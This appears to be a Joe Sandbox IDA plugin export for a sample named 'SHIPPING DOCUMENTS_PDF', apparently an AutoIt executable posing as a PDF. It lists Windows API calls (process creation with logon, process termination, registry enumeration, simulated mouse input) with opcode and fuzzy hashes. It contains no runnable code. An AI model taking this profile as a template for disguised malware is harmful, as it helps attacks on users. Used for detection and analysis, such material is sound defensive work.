                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BD7665
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                                                                    • Instruction ID: 2d32113ed6addb12c686b7694d425f546c0dc11412e87eeaac5f96aa251d762b
                                                                                    • Instruction Fuzzy Hash: 6E11B6B1150119BFEF158F64CC85EE7BF6DEF08798F014115BA04A21A0EB72DC21DBA4
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 00B79AE6
                                                                                      • Part of subcall function 00B73187: EncodePointer.KERNEL32(00000000), ref: 00B7318A
                                                                                      • Part of subcall function 00B73187: __initp_misc_winsig.LIBCMT ref: 00B731A5
                                                                                      • Part of subcall function 00B73187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B79EA0
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B79EB4
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B79EC7
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B79EDA
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B79EED
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B79F00
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B79F13
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B79F26
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B79F39
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B79F4C
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B79F5F
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B79F72
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B79F85
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B79F98
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B79FAB
                                                                                      • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B79FBE
                                                                                    • __mtinitlocks.LIBCMT ref: 00B79AEB
                                                                                    • __mtterm.LIBCMT ref: 00B79AF4
                                                                                      • Part of subcall function 00B79B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B79AF9,00B77CD0,00C0A0B8,00000014), ref: 00B79C56
                                                                                      • Part of subcall function 00B79B5C: _free.LIBCMT ref: 00B79C5D
                                                                                      • Part of subcall function 00B79B5C: DeleteCriticalSection.KERNEL32(00C0EC00,?,?,00B79AF9,00B77CD0,00C0A0B8,00000014), ref: 00B79C7F
                                                                                    • __calloc_crt.LIBCMT ref: 00B79B19
                                                                                    • __initptd.LIBCMT ref: 00B79B3B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B79B42
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 3567560977-0
                                                                                    • Opcode ID: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                                                                    • Instruction ID: a3d792a3b8cbd202e7dd9321490c9b3a74dea6172018385965d7f73cd02ae927
                                                                                    • Instruction Fuzzy Hash: C7F0903254A7126AE6347B74BC07B8A27D1DF02730F20CAEAF57CD61D2FF20884141A0
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B73F85), ref: 00B74085
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B7408C
                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00B74097
                                                                                    • DecodePointer.KERNEL32(00B73F85), ref: 00B740B2
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
• Instruction ID: 8bd2a7d5c656f4c1964015e0843eded6867060b0f8d315b13a3ae295781b98b4
• Instruction Fuzzy Hash: 65E09A7058A241ABEA119F61EC19B597AE5B705746F208075F112E21E0DFB64604DA14
APIs
• GetClientRect.USER32(?,?), ref: 00B51DDC
• GetWindowRect.USER32(?,?), ref: 00B51E1D
• ScreenToClient.USER32(?,?), ref: 00B51E45
• GetClientRect.USER32(?,?), ref: 00B51F74
• GetWindowRect.USER32(?,?), ref: 00B51F8D
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 0ee99293129a5741a0252913514a836ddb7f6cefa67430707b82076ba4df4d1b
• Instruction ID: 62d967deeb2a43b802522f7b2a73d3adf053aea0fd26b38fdf48634c789436c1
• Instruction Fuzzy Hash: C3B15B7990024ADBDF10CFA8C581BEEB7F1FF08315F1485A9EC599B254EB30AA54CB54
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
• Instruction ID: 03a47184b5b677349ac2893860b8ba8029d34e5e6635e66b296bfce904642b00
• Instruction Fuzzy Hash: 1A616A3090065A9BDF11EF64CC82BFE37E5AF05308F0445E9FC5A6B192DA78AD19CB51
APIs
  • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
  • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD02BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD02FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BD0320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BD0349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BD038C
• RegCloseKey.ADVAPI32(00000000), ref: 00BD0399
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: a2d8e106b7fb1951cdb117da7cb525c34788580759e846f4867547023f755ca4
• Instruction ID: 858f21f1ad90d822d41cdb45ea28fd9af1bc3b8770543e994d5c15d16c08f31b
• Instruction Fuzzy Hash: 96516C71218304AFC710EF64D895E6EBBE8FF89314F04499EF855872A1EB31E909CB52
APIs
• GetMenu.USER32(?), ref: 00BD57FB
• GetMenuItemCount.USER32(00000000), ref: 00BD5832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BD585A
• GetMenuItemID.USER32(?,?), ref: 00BD58C9
• GetSubMenu.USER32(?,?), ref: 00BD58D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00BD5928
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: d389b20098aeb764f3537682537d81c2a1f52eab1144d186ed1e6a74ea1a9b62
• Instruction ID: 7cce33a29f35f4ff8ec84fe43652345d46e20d68a9371a00950ac53c53fde9a1
• Instruction Fuzzy Hash: 00517C31E01A15EFCF10EF64C855AAEB7F4EF48310F1040A6E816AB351DB75AE419B90
APIs
• VariantInit.OLEAUT32(?), ref: 00BAEF06
• VariantClear.OLEAUT32(00000013), ref: 00BAEF78
• VariantClear.OLEAUT32(00000000), ref: 00BAEFD3
• _memmove.LIBCMT ref: 00BAEFFD
• VariantClear.OLEAUT32(?), ref: 00BAF04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BAF078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
• Instruction ID: 151b5b3d21c36c2ced26e2406ecbed2465667615c015f0d03595d6d50ca0bb78
• Instruction Fuzzy Hash: 67516D75A0020AEFDB24CF58C890AAAB7F8FF4D314B15856AE959DB301E735E911CF90
APIs
• _memset.LIBCMT ref: 00BB2258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB22A3
• IsMenu.USER32(00000000), ref: 00BB22C3
• CreatePopupMenu.USER32 ref: 00BB22F7
• GetMenuItemCount.USER32(000000FF), ref: 00BB2355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BB2386
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
• Instruction ID: d2949a4e5c03a4deef456a96bd5b2231885b887a12d9fd4ad03d315efd809fc0
• Instruction Fuzzy Hash: 9E51CF30A0120ADFDF21CF68D888BFEBBF5EF45318F1041A9E811972A0D7B48944CB55
APIs
  • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 00B5179A
• GetWindowRect.USER32(?,?), ref: 00B517FE
• ScreenToClient.USER32(?,?), ref: 00B5181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B5182C
• EndPaint.USER32(?,?), ref: 00B51876
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
• Opcode ID: 54235809e368fca13276a0cf668134beda2d0fa4d9ce9b00b2fcdba12e3e490a
• Instruction ID: 994753b922fc0c7c573be4b91f44f0a20729186e6ce03f2249413325237545f7
• Instruction Fuzzy Hash: 11419C71504601EFD720DF28CC84FBA7BE8FB4A725F044AA9F9A5872B1D7309849DB61
APIs
• ShowWindow.USER32(00C157B0,00000000,00D552E0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB712
• EnableWindow.USER32(00000000,00000000), ref: 00BDB736
• ShowWindow.USER32(00C157B0,00000000,00D552E0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB796
• ShowWindow.USER32(00000000,00000004,?,00BDB5A8,?,?), ref: 00BDB7A8
• EnableWindow.USER32(00000000,00000001), ref: 00BDB7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BDB7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
• Instruction ID: 24b4aa5bd017cf438fa5b8801036aff1153e06d18c52c2ce31e9b2ced28d00ce
• Instruction Fuzzy Hash: F9416A34605241EFDB26CF24C499FA4BBE0FB45310F1981EAE9598F7A2DB31AC56CB50
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00BC4E41,?,?,00000000,00000001), ref: 00BC70AC
  • Part of subcall function 00BC39A0: GetWindowRect.USER32(?,?), ref: 00BC39B3
• GetDesktopWindow.USER32 ref: 00BC70D6
• GetWindowRect.USER32(00000000), ref: 00BC70DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BC710F
  • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
• GetCursorPos.USER32(?), ref: 00BC713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BC7199
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                                                                    • Instruction ID: 14b8dd306c441d4070de01a8206e67ee89597a4700b4b1520d330903d0c6ce9e
                                                                                    • Opcode Fuzzy Hash: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                                                                    • Instruction Fuzzy Hash: F231C472509306ABD720DF14D849FABB7E9FF88314F04095EF585A7191DB70EA09CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                                                                      • Part of subcall function 00BA80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                                                                      • Part of subcall function 00BA80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                                                                      • Part of subcall function 00BA80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA80E0
                                                                                      • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00BA842F), ref: 00BA88CA
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BA88D6
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00BA88DD
                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BA88F6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00BA842F), ref: 00BA890A
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00BA8911
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 3008561057-0
                                                                                    • Opcode ID: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                                                                    • Instruction ID: 203ebe502f0785d35cdb45d5ffb0c1906cc150bf8c878c3a1b4829b3f3d635b0
                                                                                    • Opcode Fuzzy Hash: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                                                                    • Instruction Fuzzy Hash: A511A271506206FFDB109F94DC19BBFB7B8EB46311F148069E846A7110DB369E00DB60
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BA85E2
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00BA85E9
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00BA85F8
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00BA8603
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BA8632
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00BA8646
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                                                                    • Instruction ID: 1bfe341ee254715ef8de3e5abc73d6d5afe43301f8d3da12bd57127e74387e6e
                                                                                    • Opcode Fuzzy Hash: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                                                                    • Instruction Fuzzy Hash: 97115C7250520AABDF01CFA8DD49BEEBBE9EF09304F044065FE05A2160DB718D60DB60
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00BAB7B5
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BAB7C6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BAB7CD
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00BAB7D5
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BAB7EC
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00BAB7FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                                                                    • Instruction ID: afeb44e84722435d4eb4d0c5ddeaef77f87916c628a9951d075e4f943cea4660
                                                                                    • Opcode Fuzzy Hash: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                                                                    • Instruction Fuzzy Hash: 84018475E05209BBEB109FA69C45E5EBFB8EB49311F0040B6FA08A7291EA709D00CF90
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                                                                    • Instruction ID: 1804d7f480039527574f53bbc24694e7e5885ed3ba8313c06904336b7b48e158
                                                                                    • Opcode Fuzzy Hash: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                                                                    • Instruction Fuzzy Hash: 65016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BB53F9
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BB540F
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00BB541E
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB542D
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB5437
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB543E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                                                                    • Instruction ID: c07c7708ed7d7451ef13a22d4ac9cad6f1b79ffe28fab458b4f8abfbf48e3292
                                                                                    • Opcode Fuzzy Hash: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                                                                    • Instruction Fuzzy Hash: 32F06231146159BBD7205B929C1DEFBBB7CEBC6B11F00016AF905D2050AAA05A01C6B5
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00BB7243
                                                                                    • EnterCriticalSection.KERNEL32(?,?,00B60EE4,?,?), ref: 00BB7254
                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00B60EE4,?,?), ref: 00BB7261
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B60EE4,?,?), ref: 00BB726E
                                                                                      • Part of subcall function 00BB6C35: CloseHandle.KERNEL32(00000000,?,00BB727B,?,00B60EE4,?,?), ref: 00BB6C3F
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB7281
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00B60EE4,?,?), ref: 00BB7288
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                                                                    • Instruction ID: 72c8298a8768d64e399a1792c620931461bc1d53ba075f0919ca95f33c475e43
                                                                                    • Opcode Fuzzy Hash: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                                                                    • Instruction Fuzzy Hash: A1F05E3654A613EBDB112B64ED5CAFAB769EF45702B100572F543A20A0EFB65901CB50
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA899D
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00BA89A9
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BA89B2
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BA89BA
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA89C3
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00BA89CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                                                                    • Instruction ID: 341d611e0a86edba22e0d17ebb44c939e63ba326027c6d80f442ddd1d802631c
                                                                                    • Opcode Fuzzy Hash: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                                                                    • Instruction Fuzzy Hash: C7E0C936109002FBDA011FE5EC1C965FF69FB893227108232F21692170DF325420DB50
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC8613
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BC8722
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC889A
                                                                                      • Part of subcall function 00BB7562: VariantInit.OLEAUT32(00000000), ref: 00BB75A2
                                                                                      • Part of subcall function 00BB7562: VariantCopy.OLEAUT32(00000000,?), ref: 00BB75AB
                                                                                      • Part of subcall function 00BB7562: VariantClear.OLEAUT32(00000000), ref: 00BB75B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    APIs
